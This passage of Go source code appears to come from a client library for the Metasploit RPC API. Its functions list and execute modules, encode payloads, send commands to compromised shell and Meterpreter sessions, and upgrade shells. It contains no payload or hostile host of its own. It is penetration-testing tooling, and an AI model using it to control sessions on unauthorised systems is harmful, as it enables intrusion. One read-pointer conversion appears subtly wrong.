ModuleAuxiliary() (moduleAuxiliaryRes, error) { 175 | ctx := &moduleAuxiliaryReq{ 176 | Method: "module.auxiliary", 177 | Token: msf.token, 178 | } 179 | var res moduleAuxiliaryRes 180 | if err := msf.send(ctx, &res); err != nil { 181 | return moduleAuxiliaryRes{}, err 182 | } 183 | return res, nil 184 | } 185 | 186 | func (msf *Metasploit) ModulePost() (modulePostRes, error) { 187 | ctx := &modulePostReq{ 188 | Method: "module.post", 189 | Token: msf.token, 190 | } 191 | var res modulePostRes 192 | if err := msf.send(ctx, &res); err != nil { 193 | return modulePostRes{}, err 194 | } 195 | return res, nil 196 | } 197 | 198 | func (msf *Metasploit) ModulePayloads() (modulePayloadsRes, error) { 199 | ctx := &modulePayloadsReq{ 200 | Method: "module.payloads", 201 | Token: msf.token, 202 | } 203 | var res modulePayloadsRes 204 | if err := msf.send(ctx, &res); err != nil { 205 | return modulePayloadsRes{}, err 206 | } 207 | return res, nil 208 | } 209 | 210 | func (msf *Metasploit) ModuleEncoders() (moduleEncodersRes, error) { 211 | ctx := &moduleEncodersReq{ 212 | Method: "module.encoders", 213 | Token: msf.token, 214 | } 215 | var res moduleEncodersRes 216 | if err := msf.send(ctx, &res); err != nil { 217 | return moduleEncodersRes{}, err 218 | } 219 | return res, nil 220 | } 221 | 222 | func (msf *Metasploit) ModuleNops() (moduleNopsRes, error) { 223 | ctx := &moduleNopsReq{ 224 | Method: "module.nops", 225 | Token: msf.token, 226 | } 227 | var res moduleNopsRes 228 | if err := msf.send(ctx, &res); err != nil { 229 | return moduleNopsRes{}, err 230 | } 231 | return res, nil 232 | } 233 | 234 | func (msf *Metasploit) ModuleInfo(moduleType, moduleName string) (moduleInfoRes, error) { 235 | ctx := &moduleInfoReq{ 236 | Method: "module.info", 237 | Token: msf.token, 238 | ModuleType: moduleType, 239 | ModuleName: moduleName, 240 | } 241 | var res moduleInfoRes 242 | if err := msf.send(ctx, &res); err != nil { 243 | return moduleInfoRes{}, err 244 | } 245 | return res, nil 246 | } 247 | 248 | func (msf *Metasploit) ModuleOptions(moduleType, moduleName string) (moduleOptionsRes, error) { 249 | ctx := &moduleOptionsReq{ 250 | Method: "module.options", 251 | Token: msf.token, 252 | ModuleType: moduleType, 253 | ModuleName: moduleName, 254 | } 255 | var res moduleOptionsRes 256 | if err := msf.send(ctx, &res); err != nil { 257 | return moduleOptionsRes{}, err 258 | } 259 | return res, nil 260 | } 261 | 262 | func (msf *Metasploit) ModuleCompatiblePayloads(moduleName string) (moduleCompatiblePayloadsRes, error) { 263 | ctx := &moduleCompatiblePayloadsReq{ 264 | Method: "module.compatible_payloads", 265 | Token: msf.token, 266 | ModuleName: moduleName, 267 | } 268 | var res moduleCompatiblePayloadsRes 269 | if err := msf.send(ctx, &res); err != nil { 270 | return moduleCompatiblePayloadsRes{}, err 271 | } 272 | return res, nil 273 | } 274 | 275 | func (msf *Metasploit) ModuleTargetCompatiblePayloads(moduleName string, targetNumber uint32) (moduleTargetCompatiblePayloadsRes, error) { 276 | ctx := &moduleTargetCompatiblePayloadsReq{ 277 | Method: "module.target_compatible_payloads", 278 | Token: msf.token, 279 | ModuleName: moduleName, 280 | ArchNumber: targetNumber, 281 | } 282 | var res moduleTargetCompatiblePayloadsRes 283 | if err := msf.send(ctx, &res); err != nil { 284 | return moduleTargetCompatiblePayloadsRes{}, err 285 | } 286 | return res, nil 287 | } 288 | 289 | func (msf *Metasploit) ModuleCompatibleSessions(moduleName string) (moduleCompatibleSessionsRes, error) { 290 | ctx := &moduleCompatibleSessionsReq{ 291 | Method: "module.compatible_sessions", 292 | Token: msf.token, 293 | ModuleName: moduleName, 294 | } 295 | var res moduleCompatibleSessionsRes 296 | if err := msf.send(ctx, &res); err != nil { 297 | return moduleCompatibleSessionsRes{}, err 298 | } 299 | return res, nil 300 | } 301 | 302 | func (msf *Metasploit) ModuleEncode(data, encoderModule string, moduleOptions map[string]string) (moduleEncodeRes, error) { 303 | ctx := &moduleEncodeReq{ 304 | Method: "module.encode", 305 | Token: msf.token, 306 | Data: data, 307 | EncoderModule: encoderModule, 308 | Options: moduleOptions, 309 | } 310 | var res moduleEncodeRes 311 | if err := msf.send(ctx, &res); err != nil { 312 | return moduleEncodeRes{}, err 313 | } 314 | return res, nil 315 | } 316 | 317 | func (msf *Metasploit) ModuleExecute(moduleType, moduleName string, moduleOptions map[string]string) (moduleExecuteRes, error) { 318 | ctx := &moduleExecuteReq{ 319 | Method: "module.execute", 320 | Token: msf.token, 321 | ModuleType: moduleType, 322 | ModuleName: moduleName, 323 | Options: moduleOptions, 324 | } 325 | var res moduleExecuteRes 326 | if err := msf.send(ctx, &res); err != nil { 327 | return moduleExecuteRes{}, err 328 | } 329 | return res, nil 330 | } 331 | 332 | func (msf *Metasploit) GetModuleRequires(moduleType, moduleName string) ([]string, error) { 333 | var returnValues []string 334 | 335 | options, err := msf.ModuleOptions(moduleType, moduleName) 336 | 337 | if err != nil { 338 | return nil, err 339 | } 340 | 341 | for key, option := range options { 342 | if option.Required { 343 | returnValues = append(returnValues, key) 344 | } 345 | } 346 | return returnValues, nil 347 | } 348 | -------------------------------------------------------------------------------- /rpc/session.go: -------------------------------------------------------------------------------- 1 | package rpc 2 | 3 | import "fmt" 4 | 5 | // Session 6 | type sessionListReq struct { 7 | _msgpack struct{} `msgpack:",asArray"` 8 | Method string 9 | Token string 10 | } 11 | 12 | type SessionListRes map[uint32]struct { 13 | Type string `msgpack:"type"` 14 | TunnelLocal string `msgpack:"tunnel_local"` 15 | TunnelPeer string `msgpack:"tunnel_peer"` 16 | ViaExploit string `msgpack:"via_exploit"` 17 | ViaPayload string `msgpack:"via_payload"` 18 | Description string `msgpack:"desc"` 19 | Info string `msgpack:"info"` 20 | Workspace string `msgpack:"workspace"` 21 | SessionHost string `msgpack:"session_host"` 22 | SessionPort int `msgpack:"session_port"` 23 | Username string `msgpack:"username"` 24 | UUID string `msgpack:"uuid"` 25 | ExploitUUID string `msgpack:"exploit_uuid"` 26 | } 27 | 28 | type sessionWriteReq struct { 29 | _msgpack struct{} `msgpack:",asArray"` 30 | Method string 31 | Token string 32 | SessionID uint32 33 | Command string 34 | } 35 | 36 | type sessionWriteRes struct { 37 | WriteCount string `msgpack:"write_count"` 38 | } 39 | 40 | type sessionReadReq struct { 41 | _msgpack struct{} `msgpack:",asArray"` 42 | Method string 43 | Token string 44 | SessionID uint32 45 | ReadPointer string 46 | } 47 | 48 | type sessionReadRes struct { 49 | Seq uint32 `msgpack:"seq"` 50 | Data string `msgpack:"data"` 51 | } 52 | 53 | type sessionRingLastReq struct { 54 | _msgpack struct{} `msgpack:",asArray"` 55 | Method string 56 | Token string 57 | SessionID uint32 58 | } 59 | 60 | type sessionRingLastRes struct { 61 | Seq uint32 `msgpack:"seq"` 62 | } 63 | 64 | type sessionMeterpreterWriteReq struct { 65 | _msgpack struct{} `msgpack:",asArray"` 66 | Method string 67 | Token string 68 | SessionID uint32 69 | Command string 70 | } 71 | 72 | type sessionMeterpreterWriteRes struct { 73 | Result string `msgpack:"result"` 74 | } 75 | 76 | type sessionMeterpreterReadReq struct { 77 | _msgpack struct{} `msgpack:",asArray"` 78 | Method string 79 | Token string 80 | SessionID uint32 81 | } 82 | 83 | type sessionMeterpreterReadRes struct { 84 | Data string `msgpack:"data"` 85 | } 86 | 87 | type sessionMeterpreterRunSingleReq struct { 88 | _msgpack struct{} `msgpack:",asArray"` 89 | Method string 90 | Token string 91 | SessionID uint32 92 | Command string 93 | } 94 | 95 | type sessionMeterpreterRunSingleRes sessionMeterpreterWriteRes 96 | 97 | type sessionMeterpreterDetachReq struct { 98 | _msgpack struct{} `msgpack:",asArray"` 99 | Method string 100 | Token string 101 | SessionID uint32 102 | } 103 | 104 | type sessionMeterpreterDetachRes sessionMeterpreterWriteRes 105 | 106 | type sessionMeterpreterKillReq struct { 107 | _msgpack struct{} `msgpack:",asArray"` 108 | Method string 109 | Token string 110 | SessionID uint32 111 | } 112 | 113 | type sessionMeterpreterKillRes sessionMeterpreterWriteRes 114 | 115 | type sessionMeterpreterTabsReq struct { 116 | _msgpack struct{} `msgpack:",asArray"` 117 | Method string 118 | Token string 119 | SessionID uint32 120 | InputLine string 121 | } 122 | 123 | type sessionMeterpreterTabsRes struct { 124 | Tabs []string `msgpack:"tabs"` 125 | } 126 | 127 | type sessionCompatibleModulesReq struct { 128 | _msgpack struct{} `msgpack:",asArray"` 129 | Method string 130 | Token string 131 | SessionID uint32 132 | } 133 | 134 | type sessionCompatibleModulesRes struct { 135 | Modules []string `msgpack:"modules"` 136 | } 137 | 138 | type sessionShellUpgradeReq struct { 139 | _msgpack struct{} `msgpack:",asArray"` 140 | Method string 141 | Token string 142 | SessionID uint32 143 | IpAddress string 144 | PortNumber uint32 145 | } 146 | 147 | type sessionShellUpgradeRes sessionMeterpreterWriteRes 148 | 149 | type sessionRingClearReq struct { 150 | _msgpack struct{} `msgpack:",asArray"` 151 | Method string 152 | Token string 153 | SessionID uint32 154 | } 155 | 156 | type sessionRingClearRes sessionMeterpreterWriteRes 157 | 158 | type sessionRingPutReq struct { 159 | _msgpack struct{} `msgpack:",asArray"` 160 | Method string 161 | Token string 162 | SessionID uint32 163 | Command string 164 | } 165 | 166 | type sessionRingPutRes struct { 167 | WriteCount uint32 `msgpack:"write_count"` 168 | } 169 | 170 | func (msf *Metasploit) SessionList() (SessionListRes, error) { 171 | req := &sessionListReq{ 172 | Method: "session.list", 173 | Token: msf.token, 174 | } 175 | 176 | var res SessionListRes 177 | if err := msf.send(req, &res); err != nil { 178 | return nil, err 179 | } 180 | 181 | return res, nil 182 | 183 | } 184 | 185 | func (msf *Metasploit) SessionReadPointer(session uint32) (uint32, error) { 186 | ctx := &sessionRingLastReq{ 187 | Method: "session.ring_last", 188 | Token: msf.token, 189 | SessionID: session, 190 | } 191 | 192 | var sesRingLast sessionRingLastRes 193 | if err := msf.send(ctx, &sesRingLast); err != nil { 194 | return 0, err 195 | } 196 | 197 | return sesRingLast.Seq, nil 198 | } 199 | 200 | func (msf *Metasploit) SessionWrite(session uint32, command string) error { 201 | ctx := &sessionWriteReq{ 202 | Method: "session.shell_write", 203 | Token: msf.token, 204 | SessionID: session, 205 | Command: command, 206 | } 207 | 208 | var res sessionWriteRes 209 | if err := msf.send(ctx, &res); err != nil { 210 | return err 211 | } 212 | 213 | return nil 214 | } 215 | 216 | func (msf *Metasploit) SessionRead(session uint32, readPointer uint32) (string, error) { 217 | ctx := &sessionReadReq{ 218 | Method: "session.shell_read", 219 | Token: msf.token, 220 | SessionID: session, 221 | ReadPointer: string(readPointer), 222 | } 223 | 224 | var res sessionReadRes 225 | if err := msf.send(ctx, &res); err != nil { 226 | return "", err 227 | } 228 | 229 | return res.Data, nil 230 | } 231 | func (msf *Metasploit) SessionExecute(session uint32, command string) (string, error) { 232 | readPointer, err := msf.SessionReadPointer(session) 233 | if err != nil { 234 | return "", err 235 | } 236 | msf.SessionWrite(session, command) 237 | data, err := msf.SessionRead(session, readPointer) 238 | if err != nil { 239 | return "", err 240 | } 241 | return data, nil 242 | } 243 | 244 | func (msf *Metasploit) SessionExecuteList(session uint32, commands []string) (string, error) { 245 | var results string 246 | for _, command := range commands { 247 | tCommand := fmt.Sprintf("%s\n", command) 248 | result, err := msf.SessionExecute(session, tCommand) 249 | if err != nil { 250 | return results, err 251 | } 252 | results += result 253 | } 254 | 255 | return results, nil 256 | } 257 | 258 | func (msf *Metasploit) SessionMeterpreterWrite(session uint32, command string) (sessionMeterpreterWriteRes, error) { 259 | ctx := &sessionMeterpreterWriteReq{ 260 | Method: "session.meterpreter_write", 261 | Token: msf.token, 262 | SessionID: session, 263 | Command: command, 264 | } 265 | 266 | var res sessionMeterpreterWriteRes 267 | if err := msf.send(ctx, &res); err != nil { 268 | return sessionMeterpreterWriteRes{}, err 269 | } 270 | 271 | return res, nil 272 | } 273 | 274 | func (msf *Metasploit) SessionMeterpreterRead(session uint32) (sessionMeterpreterReadRes, error) { 275 | ctx := &sessionMeterpreterReadReq{ 276 | Method: "session.meterpreter_read", 277 | Token: msf.token, 278 | SessionID: session, 279 | } 280 | 281 | var res sessionMeterpreterReadRes 282 | if err := msf.send(ctx, &res); err != nil { 283 | return sessionMeterpreterReadRes{}, err 284 | } 285 | return res, nil 286 | } 287 | 288 | func (msf *Metasploit) SessionMeterpreterRunSingle(session uint32, command string) (sessionMeterpreterRunSingleRes, error) { 289 | ctx := &sessionMeterpreterRunSingleReq{ 290 | Method: "session.meterpreter_run_single", 291 | Token: msf.token, 292 | SessionID: session, 293 | Command: command, 294 | } 295 | 296 | var res sessionMeterpreterRunSingleRes 297 | if err := msf.send(ctx, &res); err != nil { 298 | return sessionMeterpreterRunSingleRes{}, err 299 | } 300 | 301 | return res, nil 302 | } 303 | 304 | func (msf *Metasploit) SessionMeterpreterSessionDetach(session uint32) (sessionMeterpreterDetachRes, error) { 305 | ctx := &sessionMeterpreterDetachReq{ 306 | Method: "session.meterpreter_session_detach", 307 | Token: msf.token, 308 | SessionID: session, 309 | } 310 | 311 | var res sessionMeterpreterDetachRes 312 | if err := msf.send(ctx, &res); err != nil { 313 | return sessionMeterpreterDetachRes{}, err 314 | } 315 | return res, nil 316 | } 317 | 318 | func (msf *Metasploit) SessionMeterpreterSessionKill(session uint32) (sessionMeterpreterKillRes, error) { 319 | ctx := &sessionMeterpreterKillReq{ 320 | Method: "session.meterpreter_session_kill", 321 | Token: msf.token, 322 | SessionID: session, 323 | } 324 | 325 | var res sessionMeterpreterKillRes 326 | if err := msf.send(ctx, &res); err != nil { 327 | return sessionMeterpreterKillRes{}, err 328 | } 329 | return res, nil 330 | } 331 | 332 | func (msf *Metasploit) SessionMeterpreterTabs(session uint32, inputLine string) (sessionMeterpreterTabsRes, error) { 333 | ctx := &sessionMeterpreterTabsReq{ 334 | Method: "session.meterpreter_tabs", 335 | Token: msf.token, 336 | SessionID: session, 337 | InputLine: inputLine, 338 | } 339 | 340 | var res sessionMeterpreterTabsRes 341 | if err := msf.send(ctx, &res); err != nil { 342 | return sessionMeterpreterTabsRes{}, err 343 | } 344 | return res, nil 345 | } 346 | 347 | func (msf *Metasploit) SessionCompatibleModules(session uint32) (sessionCompatibleModulesRes, error) { 348 | ctx := &sessionCompatibleModulesReq{ 349 | Method: "session.compatible_modules", 350 | Token: msf.token, 351 | SessionID: session, 352 | } 353 | 354 | var res sessionCompatibleModulesRes 355 | if err := msf.send(ctx, &res); err != nil { 356 | return sessionCompatibleModulesRes{}, err 357 | } 358 | return res, nil 359 | } 360 | 361 | func (msf *Metasploit) SessionShellUpgrade(session uint32, lhostAddress string, lportNumber uint32) (sessionShellUpgradeRes, error) { 362 | ctx := &sessionShellUpgradeReq{ 363 | Method: "session.shell_upgrade", 364 | Token: msf.token, 365 | SessionID: session, 366 | IpAddress: lhostAddress, 367 | PortNumber: lportNumber, 368 | } 369 | 370 | var res sessionShellUpgradeRes 371 | if err := msf.send(ctx, &res); err != nil { 372 | return sessionShellUpgradeRes{}, err 373 | } 374 | return res, nil 375 | } 376 | 377 | func (msf *Metasploit) SessionRingClear(session uint32) (sessionRingClearRes, error) { 378 | ctx := &sessionRingClearReq{ 379 | Method: "session.ring_clear", 380 | Token: msf.token, 381 | SessionID: session, 382 | } 383 | 384 | var res sessionRingClearRes 385 | if err := msf.send(ctx, &res); err != nil { 386 | return sessionRingClearRes{}, err 387 | } 388 | return res, nil 389 | } 390 | 391 | func (msf *Metasploit) SessionRingLast(session uint32) (sessionRingLastRes, error) { 392 | ctx := &sessionRingLastReq{ 393 | Method: "session.ring_last", 394 | Token: msf.token, 395 | SessionID: session, 396 | } 397 | 398 | var res sessionRingLastRes 399 | if err := msf.send(ctx, &res); err != nil { 400 | return sessionRingLastRes{}, err 401 | } 402 | return res, nil 403 | } 404 | 405 | func (msf *Metasploit) SessionRingPut(session uint32, command string) (sessionRingPutRes, error) { 406 | ctx := &sessionRingPutReq{ 407 | Method: "session.ring_put", 408 | Token: msf.token, 409 | SessionID: session, 410 | Command: command, 411 | } 412 | 413 | var res sessionRingPutRes 414 | if err := msf.send(ctx, &res); err != nil { 415 | return sessionRingPutRes{}, err 416 | } 417 | return res, nil 418 | } 419 | --------------------------------------------------------------------------------